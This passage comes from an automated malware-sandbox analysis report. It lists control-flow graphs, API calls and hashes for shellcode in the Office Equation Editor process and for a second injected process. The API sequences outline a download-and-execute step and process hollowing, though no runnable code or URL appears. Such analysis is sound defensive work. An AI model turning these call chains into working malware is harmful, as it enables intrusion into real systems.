                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID:
                                                      • API String ID: 3584569557-0
                                                      • Opcode ID: c9cebbbb7176e8bfe429d5c5c939099a6d6f70f65e7756ece03e266012943be0
                                                      • Instruction ID: 4a2bcc1e8dfb05917ca57b4830bfbb099b52a8b78bd8a6d1099b6e25617b8732
                                                      • Opcode Fuzzy Hash: c9cebbbb7176e8bfe429d5c5c939099a6d6f70f65e7756ece03e266012943be0
                                                      • Instruction Fuzzy Hash: 1621159695C3C12EDB2397300C6DB65BF641FA7600F5D89CEE1C20A4E3E6A84461C7AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 131 361069d-361069f URLDownloadToFileW 132 36106a6-36106c3 call 36106cb 131->132 133 36106a1 call 36106b6 131->133 137 36106c5-36106e5 ShellExecuteW call 36106f0 132->137 138 361072a-3610736 132->138 133->132 147 3610750-3610754 137->147 148 36106e7 137->148 139 3610739 138->139 141 3610741-3610745 139->141 142 361073b-361073f 139->142 145 3610747-361074b 141->145 146 361075a-361075c 141->146 142->141 144 361074d 142->144 144->147 145->144 145->146 151 361076c-361076d 146->151 149 3610756 147->149 150 3610758 147->150 148->139 152 36106e9 148->152 149->146 150->146 154 361075e-3610767 150->154 152->146 153 36106eb-36106f5 ExitProcess 152->153 157 3610730-3610733 154->157 158 3610769 154->158 157->154 159 3610735 157->159 158->151 159->139
                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,03610657,?,00000000,00000000), ref: 0361069F
                                                        • Part of subcall function 036106B6: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD
                                                        • Part of subcall function 036106B6: ExitProcess.KERNEL32(00000000), ref: 036106F5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID:
                                                      • API String ID: 3584569557-0
                                                      • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                      • Instruction ID: 3ad3357797ad8dad50bbb3117a404f79ccedce27a798ca2dea4b1d4b6cc28870
                                                      • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                      • Instruction Fuzzy Hash: 00F0E2A669C34079FE12F7740C5EFAA6E189FC1700F1C0889B1414D0D2E89488A0865D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 36106cb-36106dd ShellExecuteW 163 36106e4-36106e5 161->163 164 36106df call 36106f0 161->164 165 3610750-3610754 163->165 166 36106e7 163->166 164->163 167 3610756 165->167 168 3610758 165->168 169 3610739 166->169 170 36106e9 166->170 172 361075a-361075c 167->172 168->172 175 361075e-3610767 168->175 173 3610741-3610745 169->173 174 361073b-361073f 169->174 171 36106eb-36106f5 ExitProcess 170->171 170->172 179 361076c-361076d 172->179 173->172 178 3610747-361074b 173->178 174->173 177 361074d 174->177 181 3610730-3610733 175->181 182 3610769 175->182 177->165 178->172 178->177 181->175 183 3610735 181->183 182->179 183->169
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036106DD
                                                        • Part of subcall function 036106F0: ExitProcess.KERNEL32(00000000), ref: 036106F5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                      • Instruction ID: 06e1d0eee2adc51e369a0e9b1ccb9e91c6bc978165c2f265fcfb17c4669d5476
                                                      • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                      • Instruction Fuzzy Hash: 6301446FA9434371EF30F638495DBF6AA45AB81700FCC8856B980481C1D09894F38E1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 185 36106b6-36106b8 187 36106bd-36106c3 185->187 188 36106b8 call 36106cb 185->188 189 36106c5-36106e5 ShellExecuteW call 36106f0 187->189 190 361072a-3610736 187->190 188->187 199 3610750-3610754 189->199 200 36106e7 189->200 191 3610739 190->191 193 3610741-3610745 191->193 194 361073b-361073f 191->194 197 3610747-361074b 193->197 198 361075a-361075c 193->198 194->193 196 361074d 194->196 196->199 197->196 197->198 203 361076c-361076d 198->203 201 3610756 199->201 202 3610758 199->202 200->191 204 36106e9 200->204 201->198 202->198 206 361075e-3610767 202->206 204->198 205 36106eb-36106f5 ExitProcess 204->205 209 3610730-3610733 206->209 210 3610769 206->210 209->206 211 3610735 209->211 210->203 211->191
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExecuteExitProcessShell
                                                      • String ID:
                                                      • API String ID: 1124553745-0
                                                      • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                      • Instruction ID: 7c8c36467827b3521cba9a46727b9b89fe106a55064b6b003724ba05cff36243
                                                      • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                      • Instruction Fuzzy Hash: 29017D2B55830271FF71F6340D8CBEAAA859B81700F9C846AF18048080D28448F3CE1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 213 36106f0-36106f5 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(00000000), ref: 036106F5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                      • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 215 36106f7-3610702 GetPEB 216 3610705-3610716 call 361071f 215->216 219 3610718-361071c 216->219
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction ID: 35682110413f3e8b839c982bea318819a9232f05f53e77b850865cb7c1a7f862
                                                      • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                      • Instruction Fuzzy Hash: 39D092762165029FDB05DF04CA94E57F37AFFD8611B28C268E5048B759E730E8E2CA94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 220 3610583-36105aa ExitProcess call 361059c 223 36105fd-3610618 220->223 224 36105ad 220->224 229 361061a-3610620 223->229 226 36105af-36105b2 224->226 227 361061e-361061f 224->227 226->229 230 36105b5 226->230 228 3610622-3610627 227->228 231 361062a 228->231 229->228 230->231 232 36105b7-36105c6 call 36105df 230->232 235 3610638 232->235 236 36105c8-36105cd 232->236 237 36106a8-36106c3 call 36106cb 235->237 238 361063a-361063f 235->238 236->235 239 36105cf 236->239 248 36106c5-36106e5 ShellExecuteW call 36106f0 237->248 249 361072a-3610736 237->249 241 3610640-3610649 238->241 240 36105d1-36105d5 239->240 239->241 240->231 243 36105d7 240->243 244 361064b-36106a6 call 361069d URLDownloadToFileW call 36106b6 241->244 243->244 246 36105d9-36105fa call 3610617 243->246 244->237 246->223 263 3610750-3610754 248->263 264 36106e7 248->264 251 3610739 249->251 253 3610741-3610745 251->253 254 361073b-361073f 251->254 259 3610747-361074b 253->259 260 361075a-361075c 253->260 254->253 258 361074d 254->258 258->263 259->258 259->260 269 361076c-361076d 260->269 267 3610756 263->267 268 3610758 263->268 264->251 270 36106e9 264->270 267->260 268->260 273 361075e-3610767 268->273 270->260 271 36106eb-36106f5 ExitProcess 270->271 276 3610730-3610733 273->276 277 3610769 273->277 276->273 278 3610735 276->278 277->269 278->251
                                                      APIs
                                                      • ExitProcess.KERNEL32(03610571), ref: 03610583
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.382092711.0000000003610000.00000004.00000020.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3610000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: 470357c518d1ac3c00264b8293baa80544763bc2a9cee40f4a232e1ddf90b0a4
                                                      • Instruction ID: 1856431921edf35c80ad2cd51cef91b8b9e0ea4d02682540b42d5178e13bfd96
                                                      • Opcode Fuzzy Hash: 470357c518d1ac3c00264b8293baa80544763bc2a9cee40f4a232e1ddf90b0a4
                                                      • Instruction Fuzzy Hash: B511E6A682E7C45FCB12D7301E7A085BF607D9310074C85CFC0848E1A3E6658ABAC3D6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:14.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:160
                                                      Total number of Limit Nodes:2
                                                      execution_graph 11044 730583 11045 73056c 11044->11045 11046 73057b 11045->11046 11050 731466 11045->11050 11070 7313b8 11045->11070 11089 7313b5 11045->11089 11051 7313f4 11050->11051 11053 731469 11050->11053 11052 7313da 11051->11052 11108 731b92 11051->11108 11113 73208a 11051->11113 11118 731c2b 11051->11118 11123 731b04 11051->11123 11131 731aa7 11051->11131 11136 73215c 11051->11136 11141 7320dd 11051->11141 11146 73193f 11051->11146 11151 731af8 11051->11151 11156 731d79 11051->11156 11165 731ada 11051->11165 11170 731e3b 11051->11170 11174 731855 11051->11174 11178 731e15 11051->11178 11183 731c17 11051->11183 11188 731cf0 11051->11188 11052->11046 11053->11046 11071 7313d2 11070->11071 11072 731b92 2 API calls 11071->11072 11073 731cf0 2 API calls 11071->11073 11074 7313da 11071->11074 11075 731c17 2 API calls 11071->11075 11076 731e15 2 API calls 11071->11076 11077 731855 CreateProcessA 11071->11077 11078 731e3b 2 API calls 11071->11078 11079 731ada 2 API calls 11071->11079 11080 731d79 4 API calls 11071->11080 11081 731af8 2 API calls 11071->11081 11082 73193f 2 API calls 11071->11082 11083 7320dd 2 API calls 11071->11083 11084 73215c 2 API calls 11071->11084 11085 731aa7 2 API calls 11071->11085 11086 731b04 4 API calls 11071->11086 11087 731c2b 2 API calls 11071->11087 11088 73208a 2 API calls 11071->11088 11072->11074 11073->11074 11074->11046 11075->11074 11076->11074 11077->11074 11078->11074 11079->11074 11080->11074 11081->11074 11082->11074 11083->11074 11084->11074 11085->11074 11086->11074 11087->11074 11088->11074 11090 7313d2 11089->11090 11091 7313da 11090->11091 11092 731b92 2 API calls 11090->11092 11093 731cf0 2 API calls 11090->11093 11094 731c17 2 API calls 11090->11094 11095 731e15 2 API calls 11090->11095 11096 731855 CreateProcessA 11090->11096 11097 731e3b 2 API calls 11090->11097 11098 731ada 2 API calls 11090->11098 11099 731d79 4 API calls 11090->11099 11100 731af8 2 API calls 11090->11100 11101 73193f 2 API calls 11090->11101 11102 7320dd 2 API calls 11090->11102 11103 73215c 2 API calls 11090->11103 11104 731aa7 2 API calls 11090->11104 11105 731b04 4 API calls 11090->11105 11106 731c2b 2 API calls 11090->11106 11107 73208a 2 API calls 11090->11107 11091->11046 11092->11091 11093->11091 11094->11091 11095->11091 11096->11091 11097->11091 11098->11091 11099->11091 11100->11091 11101->11091 11102->11091 11103->11091 11104->11091 11105->11091 11106->11091 11107->11091 11109 731b98 11108->11109 11193 25f940 11109->11193 11197 25f938 11109->11197 11110 731bbb 11110->11052 11114 732097 11113->11114 11201 25ec20 11114->11201 11205 25ec28 11114->11205 11115 732178 11120 731935 11118->11120 11119 731de3 11119->11052 11120->11119 11209 25f7e0 11120->11209 11213 25f7d9 11120->11213 11124 731b1e 11123->11124 11125 731aa7 11123->11125 11217 25f581 11124->11217 11221 25f588 11124->11221 11126 731b7a 11125->11126 11127 25ec20 ResumeThread 11125->11127 11128 25ec28 ResumeThread 11125->11128 11126->11052 11127->11126 11128->11126 11132 731aab 11131->11132 11133 732178 11132->11133 11134 25ec20 ResumeThread 11132->11134 11135 25ec28 ResumeThread 11132->11135 11134->11133 11135->11133 11137 7320ec 11136->11137 11139 25f7e0 WriteProcessMemory 11137->11139 11140 25f7d9 WriteProcessMemory 11137->11140 11138 732289 11139->11138 11140->11138 11142 7320e6 11141->11142 11144 25f7e0 WriteProcessMemory 11142->11144 11145 25f7d9 WriteProcessMemory 11142->11145 11143 732289 11144->11143 11145->11143 11147 731940 11146->11147 11149 25f7e0 WriteProcessMemory 11147->11149 11150 25f7d9 WriteProcessMemory 11147->11150 11148 731de3 11148->11052 11149->11148 11150->11148 11152 731d7a 11151->11152 11225 7323a0 11152->11225 11231 7324d0 11152->11231 11153 731d96 11157 731d7d 11156->11157 11159 731935 11156->11159 11158 731d96 11157->11158 11163 7323a0 2 API calls 11157->11163 11164 7324d0 2 API calls 11157->11164 11161 25f7e0 WriteProcessMemory 11159->11161 11162 25f7d9 WriteProcessMemory 11159->11162 11160 731de3 11160->11052 11161->11160 11162->11160 11163->11158 11164->11158 11166 731ae0 11165->11166 11167 732178 11166->11167 11168 25ec20 ResumeThread 11166->11168 11169 25ec28 ResumeThread 11166->11169 11168->11167 11169->11167 11172 25f7e0 WriteProcessMemory 11170->11172 11173 25f7d9 WriteProcessMemory 11170->11173 11171 731a4c 11171->11052 11172->11171 11173->11171 11175 73186f 11174->11175 11244 730040 11175->11244 11179 731daa 11178->11179 11180 731de3 11178->11180 11181 25f7e0 WriteProcessMemory 11179->11181 11182 25f7d9 WriteProcessMemory 11179->11182 11180->11052 11181->11180 11182->11180 11184 731c24 11183->11184 11186 25f7e0 WriteProcessMemory 11184->11186 11187 25f7d9 WriteProcessMemory 11184->11187 11185 731de3 11185->11052 11186->11185 11187->11185 11189 731935 11188->11189 11191 25f7e0 WriteProcessMemory 11189->11191 11192 25f7d9 WriteProcessMemory 11189->11192 11190 731de3 11190->11052 11191->11190 11192->11190 11194 25f95d ReadProcessMemory 11193->11194 11196 25fa0a 11194->11196 11196->11110 11198 25f93e ReadProcessMemory 11197->11198 11200 25fa0a 11198->11200 11200->11110 11202 25ec24 ResumeThread 11201->11202 11204 25ecbe 11202->11204 11204->11115 11206 25ec6c ResumeThread 11205->11206 11208 25ecbe 11206->11208 11208->11115 11210 25f82c WriteProcessMemory 11209->11210 11212 25f8cb 11210->11212 11212->11119 11214 25f7e0 WriteProcessMemory 11213->11214 11216 25f8cb 11214->11216 11216->11119 11218 25f5d1 Wow64SetThreadContext 11217->11218 11220 25f64f 11218->11220 11220->11125 11222 25f5d1 Wow64SetThreadContext 11221->11222 11224 25f64f 11222->11224 11224->11125 11226 7323a6 11225->11226 11227 7323f1 11226->11227 11236 25f6b0 11226->11236 11240 25f6b8 11226->11240 11227->11153 11228 732504 11228->11153 11232 7324e5 11231->11232 11234 25f6b0 VirtualAllocEx 11232->11234 11235 25f6b8 VirtualAllocEx 11232->11235 11233 732504 11233->11153 11234->11233 11235->11233 11237 25f6b8 VirtualAllocEx 11236->11237 11239 25f77a 11237->11239 11239->11228 11241 25f6fc VirtualAllocEx 11240->11241 11243 25f77a 11241->11243 11243->11228 11245 7300c7 CreateProcessA 11244->11245 11247 730325 11245->11247

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 2504d8-2511fb 3 251202-2518ae call 2507b4 * 2 call 2507c4 call 2507d4 call 2507e4 * 3 call 2507f4 call 250804 * 5 call 2507e4 call 2507d4 call 250814 * 2 call 250824 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250824 0->3 4 2511fd 0->4 110 251ac0-251ad9 3->110 4->3 111 2518b3-2518e9 110->111 112 251adf-251e7f call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e10 call 250e20 call 250dd0 call 250de0 call 250df0 110->112 116 25192b-251944 111->116 183 251e86-251ea6 112->183 184 251e81 112->184 118 251946-25194c 116->118 119 2518eb-2518f8 116->119 120 2519a3-2519bc 118->120 121 2518ff-251916 119->121 122 2518fa 119->122 126 25194e-25196d 120->126 127 2519be-2519c4 120->127 123 25191d-25192a 121->123 124 251918 121->124 122->121 123->116 124->123 129 251974-25198e 126->129 130 25196f 126->130 128 251a21-251a37 127->128 131 2519c6-2519eb 128->131 132 251a39-251a45 128->132 134 251995-2519a2 129->134 135 251990 129->135 130->129 136 2519f2-251a0c 131->136 137 2519ed 131->137 138 251a47 132->138 139 251a4c-251a6b 132->139 134->120 135->134 140 251a13-251a20 136->140 141 251a0e 136->141 137->136 138->139 143 251a72-251a86 139->143 144 251a6d 139->144 140->128 141->140 145 251a8d-251aae 143->145 146 251a88 143->146 144->143 147 251ab5-251abd 145->147 148 251ab0 145->148 146->145 147->110 148->147 186 251ead-251f01 183->186 187 251ea8 183->187 184->183 190 251f03 186->190 191 251f08-251f21 186->191 187->186 190->191 193 251f23 191->193 194 251f28-251f69 191->194 193->194 197 251f70-253398 call 250e30 call 250e40 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e50 call 250e60 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e70 call 250e80 * 2 call 250e90 call 250e80 call 250e90 call 250e80 call 250e90 call 250e80 call 250e90 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e50 call 250e60 call 250ea0 call 250eb0 call 250ec0 call 250ed0 * 10 call 250ee0 call 250de0 call 250ef0 call 250f00 call 250f10 call 250f00 call 250f10 194->197
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: P?6o$C6o$C6o$C6o$C6o$C6o
                                                      • API String ID: 0-1292629685
                                                      • Opcode ID: d2826c0dbfc701ed8fbc0dbdde05332c461467d871f84e3430152e918aa72399
                                                      • Instruction ID: 53eacd0546c5b214694eb9621ba38c9b9edb0d3d19a32e80bf1d054920cbbd2d
                                                      • Opcode Fuzzy Hash: d2826c0dbfc701ed8fbc0dbdde05332c461467d871f84e3430152e918aa72399
                                                      • Instruction Fuzzy Hash: AE23C334A10219CFCB55DF68C994B99B7B6FF89301F1185E9E809AB361DB31AE85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 444 2511c0-2511fb 446 251202-2513cc call 2507b4 * 2 call 2507c4 call 2507d4 call 2507e4 * 3 444->446 447 2511fd 444->447 480 2513d6-2513e2 call 2507f4 446->480 447->446 482 2513e7-2518ae call 250804 * 5 call 2507e4 call 2507d4 call 250814 * 2 call 250824 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250824 480->482 553 251ac0-251ad9 482->553 554 2518b3-2518e9 553->554 555 251adf-251e26 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e10 call 250e20 call 250dd0 call 250de0 call 250df0 553->555 559 25192b-251944 554->559 622 251e2d-251e3f 555->622 561 251946-25194c 559->561 562 2518eb-2518f8 559->562 563 2519a3-2519bc 561->563 564 2518ff-251916 562->564 565 2518fa 562->565 569 25194e-25196d 563->569 570 2519be-2519c4 563->570 566 25191d-25192a 564->566 567 251918 564->567 565->564 566->559 567->566 572 251974-25198e 569->572 573 25196f 569->573 571 251a21-251a37 570->571 574 2519c6-2519eb 571->574 575 251a39-251a45 571->575 577 251995-2519a2 572->577 578 251990 572->578 573->572 579 2519f2-251a0c 574->579 580 2519ed 574->580 581 251a47 575->581 582 251a4c-251a6b 575->582 577->563 578->577 583 251a13-251a20 579->583 584 251a0e 579->584 580->579 581->582 586 251a72-251a86 582->586 587 251a6d 582->587 583->571 584->583 588 251a8d-251aae 586->588 589 251a88 586->589 587->586 590 251ab5-251abd 588->590 591 251ab0 588->591 589->588 590->553 591->590 623 251e4b-251e57 622->623 624 251e61-251e69 623->624 625 251e6f-251e7f 624->625 626 251e86-251ea6 625->626 627 251e81 625->627 629 251ead-251f01 626->629 630 251ea8 626->630 627->626 633 251f03 629->633 634 251f08-251f21 629->634 630->629 633->634 636 251f23 634->636 637 251f28-251f47 634->637 636->637 639 251f51-251f69 637->639 640 251f70-253398 call 250e30 call 250e40 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e50 call 250e60 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e70 call 250e80 * 2 call 250e90 call 250e80 call 250e90 call 250e80 call 250e90 call 250e80 call 250e90 call 250dd0 call 250de0 call 250df0 call 250e00 call 250dc0 call 250dd0 call 250de0 call 250df0 call 250e00 call 250e50 call 250e60 call 250ea0 call 250eb0 call 250ec0 call 250ed0 * 10 call 250ee0 call 250de0 call 250ef0 call 250f00 call 250f10 call 250f00 call 250f10 639->640
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: P?6o$C6o$C6o$C6o$C6o$C6o
                                                      • API String ID: 0-1292629685
                                                      • Opcode ID: 0477981ae5e7b073e2eb11a2b3742265a3a2f8295d3b4c8473e1917b74f83986
                                                      • Instruction ID: 4b8c6531e9f1e5417fc9c3af16f5e06f7a8239e2d420041eb29e9a37ad81ae8f
                                                      • Opcode Fuzzy Hash: 0477981ae5e7b073e2eb11a2b3742265a3a2f8295d3b4c8473e1917b74f83986
                                                      • Instruction Fuzzy Hash: CF13C234A10218CFCB65DF64C994B99B7B6FF89301F5185E9E809AB361DB31AE85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1120 2567a0-2567ce 1121 2567d5-256887 1120->1121 1122 2567d0 1120->1122 1124 25688d-2568af 1121->1124 1125 256f4f-256f5b call 256fc1 1121->1125 1122->1121 1128 2568b5-2568f9 1124->1128 1129 256f67-256f73 1124->1129 1127 256f61 1125->1127 1127->1129 1131 256f79-256f82 1128->1131 1136 2568ff-25692a 1128->1136 1129->1131 1133 256f88-256f94 1131->1133 1135 256f9a-256fa6 1133->1135 1137 256fac-256fb3 1135->1137 1139 256931-25695e 1136->1139 1140 25692c 1136->1140 1139->1133 1142 256964-256980 1139->1142 1140->1139 1142->1135 1143 256986-256996 1142->1143 1143->1137 1144 25699c-2569a7 1143->1144 1145 2569ff-256a0e 1144->1145 1146 256a10-256a24 1145->1146 1147 2569a9-2569b5 1145->1147 1151 256b05-256b19 1146->1151 1152 256a2a-256a44 1146->1152 1148 2569b7 1147->1148 1149 2569bc-2569d2 1147->1149 1148->1149 1154 2569d4-2569e1 1149->1154 1155 2569fb 1149->1155 1160 256b1f-256b35 1151->1160 1161 256f1e-256f26 1151->1161 1152->1151 1162 256a4a-256a8b 1152->1162 1157 2569e3 1154->1157 1158 2569e8-2569f6 1154->1158 1155->1145 1157->1158 1158->1147 1163 2569f8-2569f9 1158->1163 1166 256bec-256c22 1160->1166 1167 256b3b-256be6 1160->1167 1174 256a8e-256a8f 1162->1174 1163->1146 1175 256d9e-256da2 1166->1175 1176 256c28-256c2c 1166->1176 1167->1166 1177 256af4-256b03 1174->1177 1178 256ebf-256ef8 1175->1178 1179 256da8-256e2f 1175->1179 1180 256c6c-256ca4 1176->1180 1181 256c2e-256c67 1176->1181 1177->1151 1183 256a91-256a95 1177->1183 1192 256f10-256f1b 1178->1192 1212 256e95-256eb3 1179->1212 1213 256e31-256e94 call 2543d4 * 2 1179->1213 1199 256efa-256f0e 1180->1199 1200 256caa-256d10 1180->1200 1181->1192 1183->1174 1184 256a97-256aa3 1183->1184 1185 256aa5 1184->1185 1186 256aaa-256ac6 1184->1186 1185->1186 1197 256ae9-256aee 1186->1197 1198 256ac8-256ad5 1186->1198 1206 256f1c 1192->1206 1197->1160 1205 256af0 1197->1205 1202 256ad7 1198->1202 1203 256adc-256ae7 1198->1203 1199->1192 1214 256d30-256d3c 1200->1214 1215 256d12 1200->1215 1202->1203 1203->1151 1205->1177 1206->1206 1212->1178 1213->1212 1216 256d3e 1214->1216 1217 256d98-256d9b 1214->1217 1229 256d18 call 257f60 1215->1229 1230 256d18 call 257bfb 1215->1230 1222 256d49-256d5f 1216->1222 1217->1175 1220 256d1e-256d2a 1220->1214 1222->1216 1223 256d61-256d62 1222->1223 1223->1217 1229->1220 1230->1220
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [
                                                      • API String ID: 0-784033777
                                                      • Opcode ID: a2e0ab0d028f9b00f18be8693083da305bf431739c4811ef22beb3b5ac2ece99
                                                      • Instruction ID: 4e0d0b40e5527ee74d8d3385ed557258f3fd423bafcea19b6d6dcc968072c9b0
                                                      • Opcode Fuzzy Hash: a2e0ab0d028f9b00f18be8693083da305bf431739c4811ef22beb3b5ac2ece99
                                                      • Instruction Fuzzy Hash: 96329374E11229CFDB64DF65C894B9DBBB2BF88301F5085EAD809AB254DB309E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [
                                                      • API String ID: 0-784033777
                                                      • Opcode ID: 75d9bf012c13d8d01ea1956928e0ce7b6689a6b44c0169cacb7b564003f251ce
                                                      • Instruction ID: 86d2f78c75190f61743ebbdb8428817353b83939bfcfa9e55514b54597eb2c24
                                                      • Opcode Fuzzy Hash: 75d9bf012c13d8d01ea1956928e0ce7b6689a6b44c0169cacb7b564003f251ce
                                                      • Instruction Fuzzy Hash: 53C1A374E11229CFDB64DF69C884B9DBBB2BF88301F5485AAD409AB354DB309E85CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.398730023.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_9_2_250000_html.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bcd75d312fb1f2978cbfe23c7dd9a05b2da63e4c1d6805a9d43dc22d7968223
